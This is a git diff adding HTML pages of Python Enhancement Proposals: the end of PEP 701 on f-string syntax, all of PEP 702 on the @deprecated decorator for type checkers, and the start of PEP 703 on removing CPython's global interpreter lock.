  • Some users have raised concerns that quote reuse may break some lexer and syntax highlighting tools that rely +on simple mechanisms to detect strings and f-strings, such as regular expressions or simple delimiter +matching tools. Introducing quote reuse in f-strings will either make it trickier to keep these tools +working or will break the tools altogether (as, for instance, regular expressions cannot parse arbitrary nested +structures with delimiters). The IDLE editor, included in the standard library, is an example of a +tool which may need some work to correctly apply syntax highlighting to f-strings.
  • +
+

Here are some of the arguments in favour:

+
    +
  • Many languages that allow similar syntactic constructs (normally called “string interpolation”) allow quote +reuse and arbitrary nesting. These languages include JavaScript, Ruby, C#, Bash, Swift and many others. +The fact that many languages allow quote reuse can be a compelling argument in favour of allowing it in Python. This +is because it will make the language more familiar to users coming from other languages.
  • +
  • As many other popular languages allow quote reuse in string interpolation constructs, editors that support syntax highlighting for these languages will already have the necessary tools to support syntax highlighting for f-strings with quote reuse in Python. This means that although the files that handle syntax highlighting for Python will need to be updated to support this new feature, doing so is not expected to be especially difficult.
  • +
  • One advantage of allowing quote reuse is that it composes cleanly with other syntax. Sometimes this is referred to +as “referential transparency”. An example of this is that if we have f(x+1), assuming a is a brand new variable, it +should behave the same as a = x+1; f(a). And vice versa. So if we have:
    def py2c(source):
    +    prefix = source.removesuffix(".py")
    +    return f"{prefix}.c"
    +
    +
    +

    It should be expected that if we replace the variable prefix with its definition, the answer should be the same:

    +
    def py2c(source):
    +    return f"{source.removesuffix(".py")}.c"
    +
    +
    +
  • +
  • Code generators (like ast.unparse from standard library) in their +current form rely on complicated algorithms to ensure expressions within an f-string are properly suited for the context in +which they are being used. These non-trivial algorithms come with challenges such as finding an unused quote type (by tracking +the outer quotes), and generating string representations which would not include backslashes if possible. Allowing quote reuse +and backslashes would simplify the code generators which deal with f-strings considerably, as the regular Python expression logic +can be used inside and outside of f-strings without any special treatment.
  • +
  • Limiting quote reuse will considerably increase the complexity of the implementation of the proposed changes. This is because +it will force the parser to have the context that is parsing an expression part of an f-string with a given quote in order +to know if it needs to reject an expression that reuses the quote. Carrying this context around is not trivial in parsers that +can backtrack arbitrarily (such as the PEG parser). The issue becomes even more complex if we consider that f-strings can be +arbitrarily nested and therefore several quote types may need to be rejected.

    To gather feedback from the community, +a poll +has been initiated to get a sense of how the community feels about this aspect of the PEP.

    +
  • +
+
+
+
+

Backwards Compatibility

+

This PEP does not introduce any backwards incompatible syntactic or semantic changes +to the Python language. However, the tokenize module (a quasi-public part of the standard +library) will need to be updated to support the new f-string tokens (to allow tool authors +to correctly tokenize f-strings). See changes to the tokenize module for more details regarding +how the public API of tokenize will be affected.

+
+
+

How to Teach This

+

As the concept of f-strings is already ubiquitous in the Python community, there is +no fundamental need for users to learn anything new. However, as the formalized grammar +allows some new possibilities, it is important that the formal grammar is added to the +documentation and explained in detail, explicitly mentioning what constructs are possible +since this PEP is aiming to avoid confusion.

+

It is also beneficial to provide users with a simple framework for understanding what can +be placed inside an f-string expression. In this case the authors think that this work will +make it even simpler to explain this aspect of the language, since it can be summarized as:

+
+
You can place any valid Python expression inside an f-string expression.
+

With the changes in this PEP, there is no need to clarify that string quotes are +limited to be different from the quotes of the enclosing string, because this is +now allowed: as an arbitrary Python string can contain any possible choice of +quotes, so can any f-string expression. Additionally there is no need to clarify +that certain things are not allowed in the expression part because of +implementation restrictions such as comments, new line characters or +backslashes.

+

The only "surprising" difference is that, as f-strings allow specifying a format, expressions that contain a : character at the top level still need to be enclosed in parentheses. This is not new to this work, but it is important to emphasize that this restriction is still in place. This allows for an easier modification of the summary:

+
+
You can place any valid Python expression inside +an f-string expression, and everything after a : character at the top level will +be identified as a format specification.
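For illustration (standard CPython behaviour, unchanged by this PEP):

y = 5
print(f"{y:=3}")      # not a walrus: "=3" is a format specification -> '  5'
print(f"{(y := 3)}")  # parenthesized, a real assignment expression -> '3'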
+
+
+

Reference Implementation

+

A reference implementation can be found in the implementation fork.

+
+
+

Rejected Ideas

+
    +
  1. Although we think the readability arguments that have been raised against allowing quote reuse in f-string expressions are valid and very important, we have decided to propose not rejecting quote reuse in f-strings at the parser level. The reason is that one of the cornerstones of this PEP is to reduce the complexity and maintenance of parsing f-strings in CPython, and rejecting quote reuse would not only work against that goal, but might make the implementation even more complex than the current one. We believe that forbidding quote reuse should be done in linters and code style tools and not in the parser, the same way other confusing or hard-to-read constructs in the language are handled today.
  2. +
  3. We have decided not to lift the restriction that some expression portions +need to wrap ':' and '!' in parentheses at the top level, e.g.:
    >>> f'Useless use of lambdas: { lambda x: x*2 }'
    +SyntaxError: unexpected EOF while parsing
    +
    +
    +

The reason is that this will introduce a considerable amount of complexity for no real benefit. This is due to the fact that the : character normally separates the f-string format specification. This format specification is currently tokenized as a string. As the tokenizer MUST tokenize what's on the right of the : as either a string or a stream of tokens, this won't allow the parser to differentiate between the different semantics, as that would require the tokenizer to backtrack and produce a different set of tokens (that is, first try as a stream of tokens, and if it fails, try as a string for a format specifier).

    +

    As there is no fundamental advantage in being able to allow lambdas and similar +expressions at the top level, we have decided to keep the restriction that these must +be parenthesized if needed:

    +
    >>> f'Useless use of lambdas: { (lambda x: x*2) }'
    +
    +
    +
  4. +
  5. We have decided to disallow (for the time being) using escaped braces (\{ and \}) +in addition to the {{ and }} syntax. Although the authors of the PEP believe that +allowing escaped braces is a good idea, we have decided to not include it in this PEP, as it is not strictly +necessary for the formalization of f-strings proposed here, and it can be +added independently in a regular CPython issue.
  6. +
+
+
+

Open Issues

+

None yet

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0701.rst

+

Last modified: 2024-10-17 12:49:39 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0702/index.html b/pep-0702/index.html new file mode 100644 index 00000000000..ec7a0e9d5e7 --- /dev/null +++ b/pep-0702/index.html @@ -0,0 +1,496 @@ + PEP 702 – Marking deprecations using the type system | peps.python.org +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 702 – Marking deprecations using the type system

+
+
Author:
+
Jelle Zijlstra <jelle.zijlstra at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
30-Dec-2022
+
Python-Version:
+
3.13
+
Post-History:
+
01-Jan-2023, +22-Jan-2023
+
Resolution:
+
07-Nov-2023
+
+
+
+
Table of Contents +
+
+

Attention

+

This PEP is a historical document: see @deprecated and +@warnings.deprecated for up-to-date specs and documentation. Canonical typing specs are maintained at the typing specs site; runtime typing behaviour is described in the CPython documentation.

+


+

See the typing specification update process for how to propose changes to the typing spec.

+
+
+

Abstract

+

This PEP adds an @warnings.deprecated() decorator that marks a class or function +as deprecated, enabling static checkers to warn when it is used. By default, this +decorator will also raise a runtime DeprecationWarning.

+
+
+

Motivation

+

As software evolves, new functionality is added and old functionality becomes +obsolete. Library developers want to work towards removing obsolete code while +giving their users time to migrate to new APIs. Python provides a mechanism for +achieving these goals: the DeprecationWarning warning class, which is +used to show warnings when deprecated functionality is used. This mechanism is +widely used: as of the writing of this PEP, the CPython main branch contains +about 150 distinct code paths that raise DeprecationWarning. Many +third-party libraries also use DeprecationWarning to mark deprecations. +In the top 5000 PyPI packages, +there are:

+
    +
  • 1911 matches for the regex warnings\.warn.*\bDeprecationWarning\b, +indicating use of DeprecationWarning (not including cases where the +warning is split over multiple lines);
  • +
  • 1661 matches for the regex ^\s*@deprecated, indicating use of some sort of +deprecation decorator.
  • +
+

However, the current mechanism is often insufficient to ensure that users +of deprecated functionality update their code in time. For example, the +removal of various long-deprecated unittest features had to be +reverted +from Python 3.11 to give users more time to update their code. +Users may run their test suite with warnings disabled for practical reasons, +or deprecations may be triggered in code paths that are not covered by tests.

+

Providing more ways for users to find out about deprecated functionality +can speed up the migration process. This PEP proposes to leverage static type +checkers to communicate deprecations to users. Such checkers have a thorough +semantic understanding of user code, enabling them to detect and report +deprecations that a single grep invocation could not find. In addition, many type +checkers integrate with IDEs, enabling users to see deprecation warnings +right in their editors.

+
+
+

Rationale

+

At first glance, deprecations may not seem like a topic that type checkers should +touch. After all, type checkers are concerned with checking whether code will +work as is, not with potential future changes. However, the analysis that type +checkers perform on code to find type errors is very similar to the analysis +that would be needed to detect usage of many deprecations. Therefore, type +checkers are well placed to find and report deprecations.

+

Other languages already have similar functionality:

+
    +
  • GCC supports a deprecated attribute +on function declarations. This powers CPython’s Py_DEPRECATED macro.
  • +
  • GraphQL supports +marking fields as @deprecated.
  • +
  • Kotlin supports +a Deprecated annotation.
  • +
  • Scala supports +an @deprecated annotation.
  • +
  • Swift supports +using the @available attribute to mark APIs as deprecated.
  • +
  • TypeScript uses +the @deprecated JSDoc tag to issue a hint marking use of +deprecated functionality.
  • +
+

Several users have requested support for such a feature:

+ +

There are similar existing third-party tools:

+
    +
  • Deprecated provides a decorator to +mark classes, functions, or methods as deprecated. Access to decorated objects +raises a runtime warning, but is not detected by type checkers.
  • +
  • flake8-deprecated is a linter +plugin that warns about use of deprecated features. However, it is limited to +a short, hard-coded list of deprecations.
  • +
+
+
+

Specification

+

A new decorator @deprecated() is added to the warnings module. This +decorator can be used on a class, function or method to mark it as deprecated. +This includes typing.TypedDict and typing.NamedTuple definitions. +With overloaded functions, the decorator may be applied to individual overloads, +indicating that the particular overload is deprecated. The decorator may also be +applied to the overload implementation function, indicating that the entire function +is deprecated.

+

The decorator takes the following arguments:

+
    +
  • A required positional-only argument representing the deprecation message.
  • +
  • Two keyword-only arguments, category and stacklevel, controlling +runtime behavior (see under “Runtime behavior” below).
  • +
+

The positional-only argument is of type str and contains a message that should +be shown by the type checker when it encounters a usage of the decorated object. +Tools may clean up the deprecation message for display, for example +by using inspect.cleandoc() or equivalent logic. +The message must be a string literal. +The content of deprecation messages is up to the user, but it may include the version +in which the deprecated object is to be removed, and information about suggested +replacement APIs.

+

Type checkers should produce a diagnostic whenever they encounter a usage of an +object marked as deprecated. For deprecated overloads, this includes all calls +that resolve to the deprecated overload. +For deprecated classes and functions, this includes:

+
    +
  • References through module, class, or instance attributes (module.deprecated_object, +module.SomeClass.deprecated_method, module.SomeClass().deprecated_method)
  • +
  • Any usage of deprecated objects in their defining module +(x = deprecated_object() in module.py)
  • +
  • If import * is used, usage of deprecated objects from the +module (from module import *; x = deprecated_object())
  • +
  • from imports (from module import deprecated_object)
  • +
  • Any syntax that indirectly triggers a call to the function. For example, +if the __add__ method of a class C is deprecated, then +the code C() + C() should trigger a diagnostic. Similarly, if the +setter of a property is marked deprecated, attempts to set the property +should trigger a diagnostic.
  • +
+

If a method is marked with the typing.override() decorator from PEP 698 +and the base class method it overrides is deprecated, the type checker should +produce a diagnostic.

+

There are additional scenarios where deprecations could come into play. +For example, an object may implement a typing.Protocol, but one +of the methods required for protocol compliance is deprecated. +As scenarios such as this one appear complex and relatively unlikely to come up in practice, +this PEP does not mandate that type checkers detect them.

+
+

Example

+

As an example, consider this library stub named library.pyi:

+
from warnings import deprecated
+
+@deprecated("Use Spam instead")
+class Ham: ...
+
+@deprecated("It is pining for the fiords")
+def norwegian_blue(x: int) -> int: ...
+
+@overload
+@deprecated("Only str will be allowed")
+def foo(x: int) -> str: ...
+@overload
+def foo(x: str) -> str: ...
+
+class Spam:
+    @deprecated("There is enough spam in the world")
+    def __add__(self, other: object) -> object: ...
+
+    @property
+    @deprecated("All spam will be equally greasy")
+    def greasy(self) -> float: ...
+
+    @property
+    def shape(self) -> str: ...
+    @shape.setter
+    @deprecated("Shapes are becoming immutable")
+    def shape(self, value: str) -> None: ...
+
+
+

Here is how type checkers should handle usage of this library:

+
from library import Ham  # error: Use of deprecated class Ham. Use Spam instead.
+
+import library
+
+library.norwegian_blue(1)  # error: Use of deprecated function norwegian_blue. It is pining for the fiords.
+map(library.norwegian_blue, [1, 2, 3])  # error: Use of deprecated function norwegian_blue. It is pining for the fiords.
+
+library.foo(1)  # error: Use of deprecated overload for foo. Only str will be allowed.
+library.foo("x")  # no error
+
+ham = Ham()  # no error (already reported above)
+
+spam = library.Spam()
+spam + 1  # error: Use of deprecated method Spam.__add__. There is enough spam in the world.
+spam.greasy  # error: Use of deprecated property Spam.greasy. All spam will be equally greasy.
+spam.shape  # no error
+spam.shape = "cube"  # error: Use of deprecated property setter Spam.shape. Shapes are becoming immutable.
+
+
+

The exact wording of the diagnostics is up to the type checker and is not part +of the specification.

+
+
+

Runtime behavior

+

In addition to the positional-only message argument, +the @deprecated decorator takes two keyword-only arguments:

+
    +
  • category: A warning class. Defaults to DeprecationWarning. If this +is set to None, no warning is issued at runtime and the decorator returns +the original object, except for setting the __deprecated__ attribute (see below).
  • +
  • stacklevel: The number of stack frames to skip when issuing the warning. +Defaults to 1, indicating that the warning should be issued at the site where the +deprecated object is called. Internally, the implementation will add the number of +stack frames it uses in wrapper code.
  • +
+

If the decorated object is a class, the decorator wraps the __new__ method +such that instantiating the class issues a warning. If the decorated object is a +callable, the decorator returns a new callable that wraps the original callable but +raises a warning when called. Otherwise, the decorator raises a TypeError +(unless category=None is passed).

+

There are several scenarios where use of the decorated object cannot issue a warning, +including overloads, Protocol classes, and abstract methods. Type checkers may show a +warning if @deprecated is used without category=None in these cases.

+

To accommodate runtime introspection, the decorator sets an attribute +__deprecated__ on the object it is passed, as well as on the wrapper +callables it generates for deprecated classes and functions. +The value of the attribute is the message passed to the decorator. +Decorating objects that do not allow setting this attribute is not supported.

+

If a Protocol with the @runtime_checkable decorator is marked as deprecated, +the __deprecated__ attribute should not be considered a member of the protocol, +so its presence should not affect isinstance checks.

+

For compatibility with typing.get_overloads(), the @deprecated +decorator should be placed after the @overload decorator.
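
A minimal sketch of the required ordering (foo is illustrative):

from typing import get_overloads, overload
from warnings import deprecated

@overload                                # @overload on top ...
@deprecated("Only str will be allowed")  # ... @deprecated underneath
def foo(x: int) -> str: ...
@overload
def foo(x: str) -> str: ...
def foo(x): return str(x)

print(len(get_overloads(foo)))  # 2: both overloads remain discoverable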

+
+
+

Type checker behavior

+

This PEP does not specify exactly how type checkers should present deprecation +diagnostics to their users. However, some users (e.g., application developers +targeting only a specific version of Python) may not care about deprecations, +while others (e.g., library developers who want their library to remain +compatible with future versions of Python) would want to catch any use of +deprecated functionality in their CI pipeline. Therefore, it is recommended +that type checkers provide configuration options that cover both use cases. +As with any other type checker error, it is also possible to ignore deprecations +using # type: ignore comments.

+
+
+

Deprecation policy

+

We propose that CPython’s deprecation policy (PEP 387) be updated to require that new deprecations use the functionality in this PEP to alert users about the deprecation, if possible. Concretely, this means that new deprecations should be accompanied by a change to the typeshed repo to add the @deprecated decorator in the appropriate place. This requirement does not apply to deprecations that cannot be expressed using this PEP’s functionality.

+
+
+
+

Backwards compatibility

+

Creating a new decorator poses no backwards compatibility concerns. +As with all new typing functionality, the @deprecated decorator +will be added to the typing_extensions module, enabling its use +in older versions of Python.

+
+
+

How to teach this

+

For users who encounter deprecation warnings in their IDE or type +checker output, the messages they receive should be clear and self-explanatory. +Usage of the @deprecated decorator will be an advanced feature +mostly relevant to library authors. The decorator should be mentioned +in relevant documentation (e.g., PEP 387 and the DeprecationWarning +documentation) as an additional way to mark deprecated functionality.

+
+
+

Reference implementation

+

A runtime implementation of the @deprecated decorator is +available in the typing-extensions +library since version 4.5.0. +The pyanalyze type checker has +prototype support +for emitting deprecation errors, as does +Pyright.

+
+
+

Rejected ideas

+
+

Deprecation of modules and attributes

+

This PEP covers deprecations of classes, functions and overloads. This +allows type checkers to detect many but not all possible deprecations. +To evaluate whether additional functionality would be worthwhile, I +examined +all current deprecations in the CPython standard library.

+

I found:

+
    +
  • 74 deprecations of functions, methods and classes (supported by this PEP)
  • +
  • 28 deprecations of whole modules (largely due to PEP 594)
  • +
  • 9 deprecations of function parameters (supported by this PEP through +decorating overloads)
  • +
  • 1 deprecation of a constant
  • +
  • 38 deprecations that are not easily detectable in the type system (for +example, for calling asyncio.get_event_loop() without an active +event loop)
  • +
+

Modules could be marked as deprecated by adding a __deprecated__ +module-level constant. However, the need for this is limited, and it +is relatively easy to detect usage of deprecated modules simply by +grepping. Therefore, this PEP omits support for whole-module deprecations. +As a workaround, users could mark all module-level classes and functions +with @deprecated.

+

For deprecating module-level constants, object attributes, and function parameters, a Deprecated[type, message] type modifier, similar to Annotated, could be added. However, this would create a new place in the type system where strings are just strings, not forward references, complicating the implementation of type checkers. In addition, my data show that this feature is not commonly needed.
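
For illustration only, the rejected modifier might have been spelled like this hypothetical sketch (not part of this PEP or of any implementation):

# Hypothetical, rejected syntax -- not valid Python typing:
LEGACY_TIMEOUT: Deprecated[int, "Use TIMEOUT instead"] = 30

def connect(
    host: str,
    port: Deprecated[int, "Pass a full address instead"] = 80,
) -> None: ...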

+

Features for deprecating more kinds of objects could be added in a future +PEP.

+
+
+

Placing the decorator in the typing module

+

An earlier version of this PEP proposed placing the @deprecated decorator in the typing module. However, there was feedback that it would be unexpected for a decorator in the typing module to have runtime behavior. Therefore, the PEP now proposes adding the decorator to the warnings module instead.

+
+
+
+

Acknowledgments

+

A call with the typing-sig meetup group led to useful feedback on this +proposal.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0702.rst

+

Last modified: 2024-10-16 16:05:18 GMT

+ +
+ +
\ No newline at end of file diff --git a/pep-0703/index.html b/pep-0703/index.html new file mode 100644 index 00000000000..2a5ca15ca32 --- /dev/null +++ b/pep-0703/index.html @@ -0,0 +1,2030 @@
PEP 703 – Making the Global Interpreter Lock Optional in CPython | peps.python.org
+
+


+ + +
+
+
+

PEP 703 – Making the Global Interpreter Lock Optional in CPython

+
+
Author:
+
Sam Gross <colesbury at gmail.com>
+
Sponsor:
+
Łukasz Langa <lukasz at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Accepted
+
Type:
+
Standards Track
+
Created:
+
09-Jan-2023
+
Python-Version:
+
3.13
+
Post-History:
+
09-Jan-2023, +04-May-2023
+
Resolution:
+
24-Oct-2023
+
+
+
+
+
+

Note

+

The Steering Council accepts PEP 703, but with a clear proviso: that the rollout be gradual and break as little as possible, and that we can roll back any changes that turn out to be too disruptive – which includes potentially rolling back all of PEP 703 entirely if necessary (however unlikely or undesirable we expect that to be).

+
+
+

Abstract

+

CPython’s global interpreter lock (“GIL”) prevents multiple threads +from executing Python code at the same time. The GIL is an obstacle +to using multi-core CPUs from Python efficiently. This PEP proposes +adding a build configuration (--disable-gil) to CPython to let it +run Python code without the global interpreter lock and with the +necessary changes needed to make the interpreter thread-safe.

+
+
+

Motivation

+

The GIL is a major obstacle to concurrency. For scientific computing +tasks, this lack of concurrency is often a bigger issue than speed of +executing Python code, since most of the processor cycles are spent +in optimized CPU or GPU kernels. The GIL introduces a global +bottleneck that can prevent other threads from making progress if +they call any Python code. There are existing ways to enable +parallelism in CPython today, but those techniques come with +significant limitations (see Alternatives).

+

This section focuses on the GIL’s impact on scientific computing, particularly AI/ML workloads, because that is the area with which this author has the most experience, but the GIL also affects other users of Python.

+
+

The GIL Makes Many Types of Parallelism Difficult to Express

+

Neural network-based AI models expose multiple opportunities for +parallelism. For example, individual operations may be parallelized +internally (“intra-operator”), multiple operations may be executed +simultaneously (“inter-operator”), and requests (spanning multiple +operations) may also be parallelized. Efficient execution requires +exploiting multiple types of parallelism [1].

+

The GIL makes it difficult to express inter-operator parallelism, as +well as some forms of request parallelism, efficiently in Python. In +other programming languages, a system might use threads to run +different parts of a neural network on separate CPU cores, but this is +inefficient in Python due to the GIL. Similarly, latency-sensitive +inference workloads frequently use threads to parallelize across +requests, but face the same scaling bottlenecks in Python.

+

The challenges the GIL poses to exploiting parallelism in Python +frequently come up in reinforcement learning. Heinrich Kuttler, +author of the NetHack Learning Environment and Member of Technical +Staff at Inflection AI, writes:

+
+
Recent breakthroughs in reinforcement learning, such as on Dota +2, StarCraft, and NetHack rely on running multiple +environments (simulated games) in parallel using asynchronous +actor-critic methods. Straightforward multithreaded implementations +in Python don’t scale beyond more than a few parallel environments +due to GIL contention. Multiprocessing, with communication via +shared memory or UNIX sockets, adds much complexity and in effect +rules out interacting with CUDA from different workers, severely +restricting the design space.
+

Manuel Kroiss, software engineer at DeepMind on the reinforcement +learning team, describes how the bottlenecks posed by the GIL lead to +rewriting Python codebases in C++, making the code less accessible:

+
+
We frequently battle issues with the Python GIL at DeepMind. In many +of our applications, we would like to run on the order of 50-100 +threads per process. However, we often see that even with fewer +than 10 threads the GIL becomes the bottleneck. To work around this +problem, we sometimes use subprocesses, but in many cases the +inter-process communication becomes too big of an overhead. To +deal with the GIL, we usually end up translating large parts of our +Python codebase into C++. This is undesirable because it makes the +code less accessible to researchers.
+

Projects that involve interfacing with multiple hardware devices face +similar challenges: efficient communication requires use of multiple +CPU cores. The Dose-3D project aims to improve cancer +radiotherapy with precise dose planning. It uses medical phantoms +(stand-ins for human tissue) together with custom hardware and a +server application written in Python. Paweł Jurgielewicz, lead +software architect for the data acquisition system on the Dose-3D +project, describes the scaling challenges posed by the GIL and how +using a fork of Python without the GIL simplified the project:

+
+
In the Dose-3D project, the key challenge was to maintain a stable, +non-trivial concurrent communication link with hardware units while +utilizing a 1 Gbit/s UDP/IP connection to the maximum. Naturally, +we started with the multiprocessing package, but at some point, it +became clear that most CPU time was consumed by the data transfers +between the data processing stages, not by data processing itself. +The CPython multithreading implementation based on GIL was a dead +end too. When we found out about the “nogil” fork of Python it took +a single person less than half a working day to adjust the codebase +to use this fork and the results were astonishing. Now we can focus +on data acquisition system development rather than fine-tuning data +exchange algorithms.
+

Allen Goodman, author of CellProfiler and staff engineer at +Prescient Design and Genentech, describes how the GIL makes +biological methods research more difficult in Python:

+
+
Issues with Python’s global interpreter lock are a frequent source +of frustration throughout biological methods research.

I wanted to better understand the current multithreading situation +so I reimplemented parts of HMMER, a standard method for +multiple-sequence alignment. I chose this method because it +stresses both single-thread performance (scoring) and +multi-threaded performance (searching a database of sequences). The +GIL became the bottleneck when using only eight threads. This is a +method where the current popular implementations rely on 64 or +even 128 threads per process. I tried moving to subprocesses but +was blocked by the prohibitive IPC costs. HMMER is a relatively +elementary bioinformatics method and newer methods have far bigger +multi-threading demands.

+

Method researchers are begging to use Python (myself included), +because of its ease of use, the Python ecosystem, and because “it’s +what people know.” Many biologists only know a little bit of +programming (and that’s almost always Python). Until Python’s +multithreading situation is addressed, C and C++ will remain the +lingua franca of the biological methods research community.

+
+
+
+

The GIL Affects Python Library Usability

+

The GIL is a CPython implementation detail that limits multithreaded parallelism, so it might seem unintuitive to think of it as a usability issue. However, library authors frequently care a great deal about performance and will design APIs that support working around the GIL. These workarounds frequently lead to APIs that are more difficult to use. Consequently, users of these APIs may experience the GIL as a usability issue and not just a performance issue.

+

For example, PyTorch exposes a multiprocessing-based API called +DataLoader for building data input pipelines. It uses fork() +on Linux because it is generally faster and uses less memory +than spawn(), but this leads to additional challenges for users: +creating a DataLoader after accessing a GPU can lead to confusing +CUDA errors. Accessing GPUs within a DataLoader worker quickly +leads to out-of-memory errors because processes do not share CUDA +contexts (unlike threads within a process).

+

Olivier Grisel, scikit-learn developer and software engineer at Inria, +describes how having to work around the GIL in scikit-learn related +libraries leads to a more complex and confusing user experience:

+
+
Over the years, scikit-learn developers have maintained ancillary +libraries such as joblib and loky to try to work around some +of the limitations of multiprocessing: extra memory usage partially +mitigated via semi-automated memory mapping of large data buffers, +slow worker startup by transparently reusing a pool of long +running workers, fork-safety problems of third-party native runtime +libraries such as GNU OpenMP by never using the fork-only +start-method, ability to perform parallel calls of interactively +defined functions in notebooks and REPLs in cross-platform manner +via cloudpickle. Despite our efforts, this multiprocessing-based +solution is still brittle, complex to maintain and confusing to +datascientists with limited understanding of system-level +constraints. Furthermore, there are still irreducible limitations +such as the overhead caused by the pickle-based +serialization/deserialization steps required for inter-process +communication. A lot of this extra work and complexity would not be +needed anymore if we could use threads without contention on +multicore hosts (sometimes with 64 physical cores or more) to run +data science pipelines that alternate between Python-level +operations and calls to native libraries.
+

Ralf Gommers, co-director of Quansight Labs and NumPy and SciPy +maintainer, describes how the GIL affects the user experience of +NumPy and numeric Python libraries:

+
+
A key problem in NumPy and the stack of packages built around it is +that NumPy is still (mostly) single-threaded — and that has shaped +significant parts of the user experience and projects built around +it. NumPy does release the GIL in its inner loops (which do the +heavy lifting), but that is not nearly enough. NumPy doesn’t offer +a solution to utilize all CPU cores of a single machine well, and +instead leaves that to Dask and other multiprocessing solutions. +Those aren’t very efficient and are also more clumsy to use. That +clumsiness comes mainly in the extra abstractions and layers the +users need to concern themselves with when using, e.g., +dask.array which wraps numpy.ndarray. It also shows up in +oversubscription issues that the user must explicitly be aware of +and manage via either environment variables or a third package, +threadpoolctl. The main reason is that NumPy calls into BLAS +for linear algebra - and those calls it has no control over, they +do use all cores by default via either pthreads or OpenMP.

Coordinating on APIs and design decisions to control parallelism is +still a major amount of work, and one of the harder challenges +across the PyData ecosystem. It would have looked a lot different +(better, easier) without a GIL.

+
+
+
+

GPU-Heavy Workloads Require Multi-Core Processing

+

Many high-performance computing (HPC) and AI workloads make heavy use +of GPUs. These applications frequently require efficient multi-core +CPU execution even though the bulk of the computation runs on a GPU.

+

Zachary DeVito, PyTorch core developer and researcher at FAIR +(Meta AI), describes how the GIL makes multithreaded scaling +inefficient even when the bulk of computation is performed outside of +Python:

+
+
In PyTorch, Python is commonly used to orchestrate ~8 GPUs and ~64 +CPU threads, growing to 4k GPUs and 32k CPU threads for big models. +While the heavy lifting is done outside of Python, the speed of +GPUs makes even just the orchestration in Python not scalable. We +often end up with 72 processes in place of one because of the GIL. +Logging, debugging, and performance tuning are orders-of-magnitude +more difficult in this regime, continuously causing lower developer +productivity.
+

The use of many processes (instead of threads) makes common tasks more +difficult. Zachary DeVito continues:

+
+
On three separate occasions in the past couple of months +(reducing redundant compute in data loaders, writing model +checkpoints asynchronously, and parallelizing compiler +optimizations), I spent an order-of-magnitude more time figuring +out how to work around GIL limitations than actually solving the +particular problem.
+

Even GPU-heavy workloads frequently have a CPU-intensive component. +For example, computer vision tasks typically require +multiple “pre-processing” steps in the data input pipeline, like +image decoding, cropping, and resizing. These tasks are commonly +performed on the CPU and may use Python libraries like Pillow +or Pillow-SIMD. It is necessary to run the data input pipeline +on multiple CPU cores in order to keep the GPU “fed” with data.

+

The increase in GPU performance compared to individual CPU cores makes +multi-core performance more important. It is progressively more +difficult to keep the GPUs fully occupied. To do so requires efficient +use of multiple CPU cores, especially on multi-GPU systems. For +example, NVIDIA’s DGX-A100 has 8 GPUs and two 64-core CPUs in order to +keep the GPUs “fed” with data.

+
+
+

The GIL Makes Deploying Python AI Models Difficult

+

Python is widely used to develop neural network-based AI models. In +PyTorch, models are frequently deployed as part of multi-threaded, +mostly C++, environments. Python is often viewed skeptically +because the GIL can be a global bottleneck, preventing efficient +scaling even though the vast majority of the computations +occur “outside” of Python with the GIL released. The torchdeploy +paper [2] shows experimental evidence for these scaling +bottlenecks in multiple model architectures.

+

PyTorch provides a number of mechanisms for deploying Python AI models that avoid or work around the GIL, but they all come with substantial limitations. For example, TorchScript captures a representation of the model that can be executed from C++ without any Python dependencies, but it only supports a limited subset of Python and often requires rewriting some of the model’s code. The torch::deploy API allows multiple Python interpreters, each with its own GIL, in the same process (similar to PEP 684). However, torch::deploy has limited support for Python modules that use C-API extensions.

+
+
+

Motivation Summary

+

Python’s global interpreter lock makes it difficult to use modern +multi-core CPUs efficiently for many scientific and numeric computing +applications. Heinrich Kuttler, Manuel Kroiss, and Paweł +Jurgielewicz found that multi-threaded implementations in Python did +not scale well for their tasks and that using multiple processes +was not a suitable alternative.

+

The scaling bottlenecks are not solely in core numeric tasks. Both +Zachary DeVito and Paweł Jurgielewicz described challenges with +coordination and communication in Python.

+

Olivier Grisel, Ralf Gommers, and Zachary DeVito described how current +workarounds for the GIL are “complex to maintain” and cause “lower +developer productivity.” The GIL makes it more difficult to develop +and maintain scientific and numeric computing libraries as well +leading to library designs that are more difficult to use.

+
+
+
+

Specification

+
+

Build Configuration Changes

+

The global interpreter lock will remain the default for CPython builds and python.org downloads. A new build configuration flag, --disable-gil, will be added to the configure script that will build CPython with support for running without the global interpreter lock.

+

When built with --disable-gil, CPython will define the Py_GIL_DISABLED +macro in Python/patchlevel.h. The ABI tag will include the letter “t” +(for “threading”).
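
For illustration, a minimal sketch of how a C extension might detect such a build, assuming only the Py_GIL_DISABLED macro described above (the function name is illustrative):

#include <Python.h>

/* Build CPython itself without the GIL (from a source checkout):
 *   ./configure --disable-gil && make
 */
static PyObject *
describe_build(PyObject *self, PyObject *args)
{
#ifdef Py_GIL_DISABLED
    /* Compiled against a --disable-gil ("free-threaded") build. */
    return PyUnicode_FromString("free-threaded build");
#else
    return PyUnicode_FromString("default (GIL) build");
#endif
}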

+

The --disable-gil builds of CPython will still support optionally +running with the GIL enabled at runtime (see PYTHONGIL Environment +Variable and Py_mod_gil Slot).

+
+
+

Overview of CPython Changes

+

Removing the global interpreter lock requires substantial changes to +CPython internals, but relatively few changes to the public Python +and C APIs. This section describes the required changes to the +CPython implementation followed by the proposed API changes.

+

The implementation changes can be grouped into the following four +categories:

+
    +
  • Reference counting
  • +
  • Memory management
  • +
  • Container thread-safety
  • +
  • Locking and atomic APIs
  • +
+
+
+

Reference Counting

+

Removing the GIL requires changes to CPython’s +reference counting implementation to make it thread-safe. +Furthermore, it needs to have low execution overhead and allow for +efficient scaling with multiple threads. This PEP proposes a +combination of three techniques to address these constraints. The +first is a switch from plain non-atomic reference counting to biased +reference counting, which is a thread-safe reference counting +technique with lower execution overhead than plain atomic reference +counting. The other two techniques are immortalization and a limited +form of deferred reference counting; they address some of the +multi-threaded scalability issues with reference counting by avoiding +some reference count modifications.

+

